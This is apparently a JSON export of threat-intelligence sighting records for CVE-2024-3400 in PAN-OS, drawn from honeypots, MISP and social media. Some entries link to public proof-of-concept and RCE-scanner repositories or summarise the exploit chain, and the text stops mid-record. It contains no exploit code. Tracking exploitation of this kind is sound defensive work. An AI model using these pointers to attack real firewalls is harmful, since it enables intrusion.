{"uuid": "6f5715a9-3114-4103-b2b0-cbc2fdf3ef02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-01)", "content": "", "creation_timestamp": "2025-09-01T00:00:00.000000Z"}, {"uuid": "1cecb6b9-b8e7-4420-8222-69f17bbd42d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-03)", "content": "", "creation_timestamp": "2025-09-03T00:00:00.000000Z"}, {"uuid": "d246a0f7-3745-43d6-bcd5-e109e9b8a56b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-04)", "content": "", "creation_timestamp": "2025-09-04T00:00:00.000000Z"}, {"uuid": "b035252e-192a-4f2d-bc78-9b6791f833ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-d41fd0de-73d92c51d101e2d7", "content": "", "creation_timestamp": "2025-12-07T11:30:09.681086Z"}, {"uuid": "9a02d979-49b3-4e3f-aa6b-83ec12c73b73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/concisecyber.bsky.social/post/3m7e3txcear2r", "content": "", "creation_timestamp": "2025-12-06T22:55:04.029215Z"}, {"uuid": "529d371d-d68d-44ad-95b6-ec7f90be54cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mgbyc3oogb2d", "content": "", "creation_timestamp": "2026-03-05T04:42:25.494647Z"}, {"uuid": "1c2d8aeb-f8c4-441b-ba10-1e1ed8e02d30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-12)", "content": "", "creation_timestamp": "2025-12-12T00:00:00.000000Z"}, {"uuid": "e2e62285-f04f-4f83-b9f5-cfa52252a3de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/d7d63b76-30b2-426d-b539-96195ff33907", "content": "", "creation_timestamp": "2026-02-07T01:56:17.000000Z"}, {"uuid": "db174285-e594-4b77-8a8f-7d3988729a43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/42ec6a69-f0c4-430d-b5ee-d199b2efc32a", "content": "", "creation_timestamp": "2026-02-07T02:06:08.000000Z"}, {"uuid": "86abf356-2772-4324-bed0-e32576775714", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-11)", "content": "", "creation_timestamp": "2025-12-11T00:00:00.000000Z"}, {"uuid": "7114c86e-3243-4044-9ac2-8dd02389934e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/hakksaww.bsky.social/post/3mgal53ruas2u", "content": "", "creation_timestamp": "2026-03-04T15:14:19.992293Z"}, {"uuid": "ab8c6579-10a4-40b0-9bd4-db9504d29f21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_12/2024", "content": "", "creation_timestamp": "2024-04-12T08:26:41.000000Z"}, {"uuid": "264aa03e-5e0d-4768-8486-23dae7744c07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-01)", "content": "", "creation_timestamp": "2026-01-01T00:00:00.000000Z"}, {"uuid": "facd57b9-44ea-4144-8f17-3f40c3a8a75d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1270", "content": "", "creation_timestamp": "2024-04-15T04:00:00.000000Z"}, {"uuid": "aaaecac7-5375-4b40-8562-8b8d9542b4dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/e3ff8696-592c-4423-9a57-2cb2716b141e", "content": "", "creation_timestamp": "2025-08-29T14:07:34.392990Z"}, {"uuid": "443d8084-7978-47b4-b934-446eba1d80ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-20)", "content": "", "creation_timestamp": "2026-03-20T00:00:00.000000Z"}, {"uuid": "2317946d-c702-4505-b866-668b8849421b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-21)", "content": "", "creation_timestamp": "2026-03-21T00:00:00.000000Z"}, {"uuid": "cdd885fb-ba16-4679-bb92-23ca8eb2a9b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-20)", "content": "", "creation_timestamp": "2026-03-20T00:00:00.000000Z"}, {"uuid": "7aa9f231-deb4-4a26-ba01-7bd635ca98a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/tietomurtoja-palo-alto-globalprotect-tuotteisiin-vaatii-valittomia-toimia", "content": "", "creation_timestamp": "2024-04-18T08:50:45.000000Z"}, {"uuid": "95b46ff6-8495-4307-9932-3048cb1b53d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "97816c79-6ec8-454f-a831-2d7cfed25bda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/11268897-8798-4ec2-bcac-b23fe0715823", "content": "", "creation_timestamp": "2025-03-11T20:37:58.600981Z"}, {"uuid": "16158fe4-662c-4259-b971-0deaaf3c3adf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9253", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 PAN-OS Vulnerability Scanner.\nURL\uff1ahttps://github.com/nanwinata/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-30T05:51:56.000000Z"}, {"uuid": "f682c503-fd4e-4c56-8b4d-12541c98b9cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/3f512b0f-f3ce-4bd7-9a3c-59f73c44c882", "content": "", "creation_timestamp": "2026-02-02T12:26:38.064387Z"}, {"uuid": "313adac3-95f8-4fdc-b0af-2e3ff16a3af7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-21)", "content": "", "creation_timestamp": "2026-03-21T00:00:00.000000Z"}, {"uuid": "d00e5847-19f9-4594-a371-d2b5448fb135", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/n_s0Yn7lrdKniJIJlbaHGPPYTRcEg2hSGfe9ZskixUi-yV0", "content": "", "creation_timestamp": "2024-04-15T10:39:03.000000Z"}, {"uuid": "b7a7f0c4-6c71-4c4d-8259-8cb183ab4f6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/swTqqQyj9Mmx46rOHgE069Cf9rrq1oAExNDiQsmKnGE_B7c", "content": "", "creation_timestamp": "2024-04-12T13:20:30.000000Z"}, {"uuid": "9f782652-4661-4441-9078-e8a2c45a88b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://mastodon.social/ap/users/115426718704364579/statuses/116408996294259972", "content": "", "creation_timestamp": "2026-04-15T13:38:47.147385Z"}, {"uuid": "0f59a4e8-054b-4b55-81d9-26326e26f99c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/netsecio.bsky.social/post/3mjjzfihwfo2n", "content": "", "creation_timestamp": "2026-04-15T13:39:05.987564Z"}, {"uuid": "d4fb7e8c-fe15-4efd-9034-a48f3b387778", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7055", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aA simple bash script to check for evidence of compromise related to CVE-2024-3400\nURL\uff1ahttps://github.com/MurrayR0123/CVE-2024-3400-Compromise-Checker\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-15T04:18:06.000000Z"}, {"uuid": "3dcd955a-a52d-488a-b5fe-df67332ff53d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/crackvaultde/41", "content": "CVE-2024-3400 is a security vulnerability affecting applications or services that accept user input and execute operating system commands based on that input without adequate validation. This vulnerability allows attackers to inject malicious or damaging OS commands through received input, potentially resulting in system exploitation, data manipulation, or even full control over the vulnerable system.\n\nFor more information and updates, please refer to the CVE-2024-3400.\n\n*Note\nPlease wait for the response results. The response takes quite a long time", "creation_timestamp": "2024-09-05T01:30:12.000000Z"}, {"uuid": "5e66c767-a19b-4695-93c6-9f7329e18478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/cKure/12714", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Palo Alto Networks firewalls under attack, hotfixes incoming! (CVE-2024-3400).\n\nhttps://www.helpnetsecurity.com/2024/04/12/cve-2024-3400/", "creation_timestamp": "2024-04-12T23:54:00.000000Z"}, {"uuid": "f32f4894-3a57-4a0a-96ab-8e3e15f51208", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7053", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aA simple bash script to check for evidence of compromise related to CVE-2024-3400\nURL\uff1ahttps://github.com/MurrayR0123/CVE-2024-3400_compromise_checker\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-15T03:29:59.000000Z"}, {"uuid": "d31e3626-3b95-4167-ad03-0955944f1a1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7135", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400-RCE\nURL\uff1ahttps://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-22T08:53:03.000000Z"}, {"uuid": "e67aad64-79c4-4177-b434-de2901b21cb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9004", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aAttempt at making the CVE-2024-3400 initial exploit (for educational purposes)\nURL\uff1ahttps://github.com/workshop748/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-12T03:51:19.000000Z"}, {"uuid": "e385b1f7-9511-4181-99b2-0888eb3d2e62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/ptswarm/207", "content": "CVE-2024-3400 - Technical Analysis\n\n\ud83d\udc64 by Rapid7\n\nRapid7\u2019sanalysis of this vulnerability has identified that the exploit is in fact an exploit chain, consisting of two distinct vulnerabilities: an arbitrary file creation vulnerability in the GlobalProtect web server, for which no discrete CVE has been assigned, and a command injection vulnerability in the device telemetry feature, designated as CVE-2024-3400.\n\nIf device telemetry is disabled, it is still possible to leverage the file creation vulnerability; at time of writing, however, Rapid7 has not identified an alternative way to leverage the file creation vulnerability for successful exploitation.\n\n\ud83d\udcdd Contents:\n\u25cf Overview\n\u25cf Analysis\n    \u2022 Rooting the Device\n    \u2022 Diffing the Patch\n    \u2022 Arbitrary File Creation\n    \u2022 Command Injection Exploitation\n\u25cf IOCs\n\u25cf Remediation\n\nhttps://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis", "creation_timestamp": "2024-04-17T05:45:52.000000Z"}, {"uuid": "3d5c6f1c-bb66-4048-915a-675b9ee40395", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7050", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 POC Remote Code Execution (RCE)  Palo Alto Networks PAN-OS software\nURL\uff1ahttps://github.com/kerberoshacker/CVE-2024-3400-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-15T07:58:22.000000Z"}, {"uuid": "cb3e0372-e3a6-421b-9bb8-23a689d5348d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/codeby_sec/9384", "content": "\ud83c\udde8\ud83c\uddf3 \u041a\u0438\u0442\u0430\u0439\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u0441\u0435\u0442\u0435\u0432\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \n\n\ud83d\udc32 \u041a\u0438\u0442\u0430\u0439\u0441\u043a\u0430\u044f APT-\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 Salt Typhon \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u043b 600 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.\n\n\ud83c\udf0e \u0414\u0430\u043d\u043d\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0441\u0432\u043e\u0438 \u0430\u0442\u0430\u043a\u0438, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0435 \u043d\u0430 \u0441\u0435\u0442\u0438 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0442\u0435\u043b\u0435\u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439, \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u0442\u0440\u0430\u043d\u0441\u043f\u043e\u0440\u0442\u0430, \u0433\u043e\u0441\u0442\u0438\u043d\u0438\u0447\u043d\u043e\u0433\u043e \u0431\u0438\u0437\u043d\u0435\u0441\u0430 \u0438 \u0432\u043e\u0435\u043d\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b.\n\n\ud83c\udfe2 \u0412 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u0435 , \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u043c \u0432\u043b\u0430\u0441\u0442\u044f\u043c\u0438 13 \u0441\u0442\u0440\u0430\u043d, \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f, \u0447\u0442\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0442\u0440\u0435\u043c\u044f \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0438\u043c\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c\u0438: Sichuan Juxinhe Network Technology Co., Ltd., Beijing Huanyu Tianqiong Information Technology Co., Ltd. \u0438 Sichuan Zhixin Ruijie Network Technology Co., Ltd.\n\n\ud83d\udc69\u200d\ud83d\udcbb Salt Typhoon \u0431\u044b\u043b \u0437\u0430\u043c\u0435\u0447\u0435\u043d \u043f\u0440\u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043f\u0443\u0442\u0435\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u043f\u0435\u0440\u0438\u0444\u0435\u0440\u0438\u0439\u043d\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043e\u0442 Cisco ( CVE-2018-0171 , CVE-2023-20198 \u0438 CVE-2023-20273 ), Ivanti ( CVE-2023-46805 \u0438 CVE-2024-21887 ) \u0438 Palo Alto Networks ( CVE-2024-3400 ).", "creation_timestamp": "2025-09-12T15:42:01.000000Z"}, {"uuid": "5dbb3701-edac-4f93-9242-1b5deb9174f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/itsec_news/5413", "content": "\u200b\u26a1\ufe0f600 \u0436\u0435\u0440\u0442\u0432 \u0437\u0430 \u0433\u043e\u0434: RansomHub \u2013 \u043d\u043e\u0432\u044b\u0439 \u043b\u0438\u0434\u0435\u0440 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0430\u0442\u0430\u043a\n\n\ud83d\udcac \u0412 2024 \u0433\u043e\u0434\u0443 \u043d\u0430 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u0441\u0446\u0435\u043d\u0435 \u0441\u0442\u0440\u0435\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u043d\u043e\u0432\u044b\u0439 \u0438\u0433\u0440\u043e\u043a \u2014 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 RansomHub, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u0441\u043f\u0435\u043b\u0430 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0443\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 600 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. \u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f Group-IB, \u0433\u0440\u0443\u043f\u043f\u0430 RansomHub \u0437\u0430\u043f\u043e\u043b\u043d\u0438\u043b\u0430 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0443\u044e \u043d\u0438\u0448\u0443 \u043f\u043e\u0441\u043b\u0435 \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u0445 \u043d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0439 \u0432 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 ALPHV \u0438 LockBit .\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e RansomHub \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 ransomware-as-a-service (RaaS), \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u0440\u0438\u0432\u043b\u0435\u043a\u0430\u044f \u043f\u0430\u0440\u0442\u043d\u0451\u0440\u043e\u0432 \u043d\u0430 \u043f\u043e\u0434\u043f\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u043e\u0440\u0443\u043c\u0430\u0445, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a RAMP. \u041e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u0435\u0439 \u0441\u0442\u0430\u043b\u043e \u043f\u0435\u0440\u0435\u043c\u0430\u043d\u0438\u0432\u0430\u043d\u0438\u0435 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 , \u0440\u0430\u043d\u0435\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0432\u0448\u0438\u0445 \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u043e RansomHub \u0431\u044b\u0441\u0442\u0440\u043e \u043d\u0430\u0440\u0430\u0441\u0442\u0438\u0442\u044c \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u044b \u0430\u0442\u0430\u043a.\n\n\u0410\u043d\u0430\u043b\u0438\u0437 \u043a\u043e\u0434\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430 \u043f\u043e\u043a\u0430\u0437\u0430\u043b, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u043b\u0430 \u0441\u0432\u043e\u0451 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435 \u0443 Knight (Cyclops), \u0434\u0440\u0443\u0433\u043e\u0439 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0433\u043e\u0442\u043e\u0432\u044b\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0443\u0441\u043a\u043e\u0440\u0438\u043b\u043e \u0440\u0430\u0437\u0432\u0451\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u0430\u0442\u0430\u043a, \u0430 \u043c\u0443\u043b\u044c\u0442\u0438\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0430 Windows, ESXi, Linux \u0438 FreeBSD, \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u044f \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 